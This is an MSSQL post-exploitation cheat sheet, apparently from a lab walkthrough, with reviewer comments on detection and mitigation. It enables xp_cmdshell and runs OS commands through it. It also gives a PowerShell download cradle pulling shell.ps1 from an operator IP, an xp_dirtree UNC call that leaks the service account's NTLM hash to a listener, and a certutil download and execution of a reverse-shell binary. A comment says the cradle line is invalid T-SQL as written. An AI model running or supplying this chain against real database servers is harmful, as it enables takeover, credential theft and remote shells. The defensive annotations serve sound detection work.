-- MSSQL post-exploitation cheat sheet: enumerate the instance, enable
-- xp_cmdshell, then run OS commands through it. Everything below runs
-- in the context of the current SQL login, and the OS-level steps
-- (xp_cmdshell, xp_dirtree) run as the SQL Server service account (or
-- the xp_cmdshell proxy account when one is configured) -- which is why
-- a least-privilege service account is the main mitigation for the
-- whole chain.
-- checks version
select @@version;
-- show databases
EXEC sp_databases;
-- checks if user has sysadmin privileges (1 means
-- sysadmin, 0 means not a member, NULL means the login
-- or role could not be resolved)
SELECT IS_SRVROLEMEMBER('sysadmin')
-- enables xp_cmdshell
-- 'show advanced options' has to be on before sp_configure will accept
-- 'xp_cmdshell'. Changing either option needs the ALTER SETTINGS server
-- permission (held by sysadmin / serveradmin) and writes a
-- "Configuration option ... changed" message to the SQL Server error
-- log, so this is a natural detection point for the chain.
EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
-- bare sp_configure with no arguments only lists the current settings
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
-- quick check that the feature is now on (same command is repeated
-- below under "executes commands")
xp_cmdshell "whoami"
-- executes commands
-- each xp_cmdshell call spawns cmd.exe as a child of sqlservr.exe; that
-- parent/child relationship is the usual EDR detection for this step
xp_cmdshell "whoami"
xp_cmdshell dir
-- make victim download from our machine (10.10.14.60)
-- NOTE(review): the nested double quotes on the next line are not a
-- valid T-SQL literal as written; left as captured. From the defender's
-- side this is an outbound HTTP request from the database host plus a
-- PowerShell download cradle: egress filtering on DB servers and
-- PowerShell script block logging / AMSI both surface it.
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.60/shell.ps1\");"
-- Intercept NTLM hash of user (be sure to fire up
-- responder first)
-- The UNC path makes SQL Server authenticate to 10.11.40.33 over SMB,
-- so the credential that leaves the box is presumably the service
-- account's rather than the SQL login's. Blocking outbound TCP/445 from
-- database servers and running the service as a low-privilege or
-- managed service account are the mitigations.
-- ("SQL>" is the client prompt captured with the command, not part of
-- the statement.)
SQL> xp_dirtree '\\10.11.40.33\anything'
-- Transfer a reverse shell binary and execute it
-- certutil -urlcache -f fetching over HTTP is a well-known LOLBin
-- download pattern; certutil.exe opening network connections from a
-- SQL Server host is a high-signal detection. Note 10.11.40.33 here
-- differs from the 10.10.14.60 used above -- both are the operator's
-- machine in this walkthrough.
xp_cmdshell certutil -urlcache -f http://10.11.40.33/reverse.exe c:\users\SVC-Kerb.DC01\reverse.exe
xp_cmdshell c:\users\SVC-Kerb.DC01\reverse.exe